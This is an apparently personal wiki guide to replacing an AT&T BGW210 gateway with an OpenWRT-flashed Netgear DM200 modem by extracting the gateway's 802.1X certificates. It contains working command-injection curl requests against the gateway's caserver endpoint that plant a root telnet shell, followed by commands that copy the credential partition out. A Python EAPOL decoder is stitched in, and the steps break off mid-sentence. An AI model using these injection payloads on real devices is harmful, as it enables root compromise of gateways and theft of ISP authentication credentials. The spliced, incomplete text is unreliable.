uverse_hacking

Hardware Needed
  • Netgear DM200 VDSL modem
  • AT&T Uverse Router / Gateway BGW210-700
Software Needed
Setup Netgear DM200 VDSL Modem

The Netgear DM200 VDSL modem needs to be flashed to use OpenWRT, and some prep work needs to be started before we can take down the AT&T UVerse modem. The reason why we have to use OpenWRT for the DM200 modem is because AT&T uses EAPOL for authentication vs every other DSL provider that uses PPPoE. The stock firmware on the Netgear DM200 does have PPPoE support, but no EAPOL. Additionally, I have tried putting the modem into bridge mode and running wpa_supplicant on my router, but no EAP packets are forwarded to AT&T's authenticator through the Netgear DM200 modem's bridge. From my tinkering, the Netgear DM200 uses a standard brctl Linux bridge. However, the standard brctl Linux bridge does not forward EAPOL packets due to its design. It's possible to force the bridge to forward EAPOL packets, but in testing this did not work, either with the stock DM200 firmware or the OpenWRT firmware.

In this configuration, we are going to be running wpa_supplicant on the DM200 itself and bridging the DSL connection to the Ethernet connection. This gives a pure layer 2 bridge to the AT&T DSL network with no MTU shifting, and the DM200 spends no resources managing or tracking connections beyond maintaining the layer 2 bridge and running wpa_supplicant.
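
The bridge problem described above (no EAP frames crossing the DM200's bridge) is easiest to confirm with a capture on the router's WAN port filtered for EtherType 0x888E. The decoder below is an added example, not code from the original page or from the OpenWRT project: it parses EAPOL frames from such a capture and reports whether an EAP-Request from the ISP-side authenticator was ever seen. The sample frames and MAC addresses are constructed placeholders.

```python
import struct

PAE_GROUP_ADDR = bytes.fromhex("0180c2000003")  # 802.1X PAE multicast (link-local, not bridged)
ETH_P_PAE = 0x888E
EAPOL_TYPES = {0: "EAP-Packet", 1: "EAPOL-Start", 2: "EAPOL-Logoff", 3: "EAPOL-Key"}
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPES = {1: "Identity", 13: "TLS"}


def decode_eapol(frame: bytes):
    """Return a dict describing an EAPOL frame, or None if the frame is not EAPOL."""
    if len(frame) < 18:
        return None
    dst, src = frame[:6], frame[6:12]
    ethertype, version, ptype, body_len = struct.unpack("!HBBH", frame[12:18])
    if ethertype != ETH_P_PAE:
        return None
    body = frame[18:18 + body_len]
    if len(body) != body_len:
        return None  # truncated on the wire; do not trust the header
    info = {"dst": dst.hex(":"), "src": src.hex(":"), "version": version,
            "type": EAPOL_TYPES.get(ptype, "unknown(%d)" % ptype)}
    if ptype == 0 and len(body) >= 4:  # an EAP-Packet carries an EAP header
        code, ident, eap_len = struct.unpack("!BBH", body[:4])
        info["eap_code"] = EAP_CODES.get(code, "unknown(%d)" % code)
        info["eap_id"] = ident
        if code in (1, 2) and eap_len >= 5 and len(body) >= 5:
            info["eap_type"] = EAP_TYPES.get(body[4], "unknown(%d)" % body[4])
    return info


def build_eapol(dst: bytes, src: bytes, ptype: int, body: bytes = b"") -> bytes:
    """Assemble an EAPOL v2 frame (used here only to construct sample input)."""
    return dst + src + struct.pack("!HBBH", ETH_P_PAE, 2, ptype, len(body)) + body


def authenticator_seen(frames) -> bool:
    """True if any frame is an EAP-Request; only EAPOL-Start means the bridge dropped the replies."""
    for frame in frames:
        info = decode_eapol(frame)
        if info and info.get("eap_code") == "Request":
            return True
    return False


# Constructed sample capture: locally administered MACs, not real devices.
SUPPLICANT_MAC = bytes.fromhex("020000000001")
AUTHENTICATOR_MAC = bytes.fromhex("020000000002")
SAMPLE_FRAMES = [
    build_eapol(PAE_GROUP_ADDR, SUPPLICANT_MAC, 1),                              # EAPOL-Start
    build_eapol(SUPPLICANT_MAC, AUTHENTICATOR_MAC, 0, bytes([1, 1, 0, 5, 1])),  # EAP-Request/Identity
    b"\xff" * 6 + SUPPLICANT_MAC + b"\x08\x00" + b"\x45" + b"\x00" * 19,         # IPv4 broadcast, not EAPOL
]
```

Feed it the raw frames from a tcpdump capture of the router's WAN port; if `authenticator_seen` stays False while EAPOL-Start frames are present, the bridge is not passing the exchange.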

  1. Head over to https://openwrt.org/toh/netgear/dm200 and flash the OpenWRT firmware to the DM200
  2. After the DM200 comes up, log into the DM200 and reconfigure the eth0 interface to be a DHCP client.
  3. Set the DM200 to apply changes without verification, and then plug the modem into your home network with internet access.
  4. Log into the DM200 again and go into the system settings to synchronize the time to your browser and set your time zone. This is important because the authentication certificates are time dependent.
  5. Change the root password; this activates the SSH server so you can log into the DM200 with SSH.
  6. Go to the package manager in the DM200 and install the following packages:
    1. wpa-supplicant
    2. ca-certificates
    3. openssh-sftp-server
Extract Certificates From AT&T UVerse RG
  1. Unzip AT&T RG Uverse firmware package - we're looking for spTurquoise210-700_1.0.29.bin
  2. Disconnect the DSL cable from the UVerse RG.
  3. Log into your UVerse RG and downgrade the firmware with the above firmware file. The process takes several minutes and the modem will reboot.
  4. After the modem is running again, go to http://192.168.1.254/cgi-bin/ipalloc.ha and assign yourself a static IP address
  5. Refresh your computer's IP address to make sure you have the private IP address that was assigned.
  6. Log into the UVerse RG again and authenticate
  7. Run the following curl commands to start a telnet server on the UVerse modem. When prompted for the password for the user tech, just hit ENTER. After the last command is executed, the UVerse RG will reboot.
    • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| echo 28telnet stream tcp nowait root /usr/sbin/telnetd -i -l /bin/nsh > /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
    • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -a /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
    • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -s|" -v --http1.1 https://192.168.1.254:49955/caserver
    • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| reboot|" -v --http1.1 https://192.168.1.254:49955/caserver
  8. Log into the UVerse RG with PuTTY using the IP address 192.168.1.254 on port 28 using the Telnet selection
  9. Remount root file system as writeable
    • mount -o remount,rw /dev/ubi0 /
  10. Mount the mfg partition which contains the certificates
    • mount mtd:mfg -t jffs2 /mfg
  11. Copy the certificate bundle to the web server directory
    • cp /mfg/mfg.dat /www/att/mfg.dat
  12. Tar and copy the intermediate and root certificates to the web server directory
    • tar -zcvf /www/att/certs.tar.gz /etc/rootcert/
  13. Download the certificate bundle and the intermediate and root certificates:
  14. Throw the UVerse RG into the garbage
    • Don't actually throw it in the garbage, you need to return it when you terminate your service with AT&T otherwise they will bill you a hefty sum.
    • Using the firmware archive that was downloaded earlier, you can step the UVerse back up to the current firmware by flashing 1.0.29, then 1.5.12, then 2.7.1
  15. Extract the mfg_dat_decode utility that was downloaded earlier
  16. Extract the certs.tar.gz archive that was downloaded earlier
  17. Copy the mfg.dat file into the folder with the mfg_dat_decode binary
  18. Copy all of the certificates extracted from certs.tar.gz into the folder with the mfg_dat_decode binary
  19. Run the mfg_dat_decode binary, which will extract and create a tar.gz containing certificates and a wpa_supplicant.conf configuration file.
  20. Extract the tar.gz file - you'll end up with a directory that contains three pem formatted certificates, a sample wpa_supplicant.conf file, and a readme.txt file.
Load wpa_supplicant Files To DM200
  1. Create a new text file, and paste the following into it and save it as 99_dsl_eap.sh
#!/bin/sh
# DSL hotplug handler: start wpa_supplicant when the DSL line comes up,
# stop it when the line goes down. OpenWRT passes the event in
# DSL_NOTIFICATION_TYPE and DSL_INTERFACE_STATUS.

PIDFILE=/var/run/wpa_supplicant.pid

logger -t DSL "$DSL_NOTIFICATION_TYPE $DSL_INTERFACE_STATUS"

if [ "$DSL_NOTIFICATION_TYPE" = "DSL_INTERFACE_STATUS" ] && [ "$DSL_INTERFACE_STATUS" = "UP" ]; then
        logger -t DSL "DSL interface UP, starting wpa_supplicant..."
        # Wired (EAPOL) driver on dsl0; -b names the bridge the interface is enslaved to
        /usr/sbin/wpa_supplicant -s -B -P "$PIDFILE" -D wired -i dsl0 -b br-br0 -c /etc/wpa_supplicant/wpa_supplicant.conf
        # Bounce the LAN-side port once the supplicant is running
        ip link set eth0 down
        sleep 5
        ip link set eth0 up
fi

if [ "$DSL_NOTIFICATION_TYPE" = "DSL_INTERFACE_STATUS" ] && [ "$DSL_INTERFACE_STATUS" = "DOWN" ]; then
        logger -t DSL "DSL interface DOWN, killing wpa_supplicant..."
        # Use the same PID file that was written at start-up
        if [ -e "$PIDFILE" ]; then
                kill "$(cat "$PIDFILE")"
        fi
        ip link set eth0 down
fi
  2. Connect to the DM200 using FileZilla in SFTP mode with the root username and password
  3. Create the new directory /etc/wpa_supplicant
  4. Copy the three pem formatted certificates and the wpa_supplicant.conf file into the /etc/wpa_supplicant directory
  5. Copy
Sources and References
uverse_hacking.1598241525.txt.gz · Last modified: 2020/08/23 22:58 by pengc99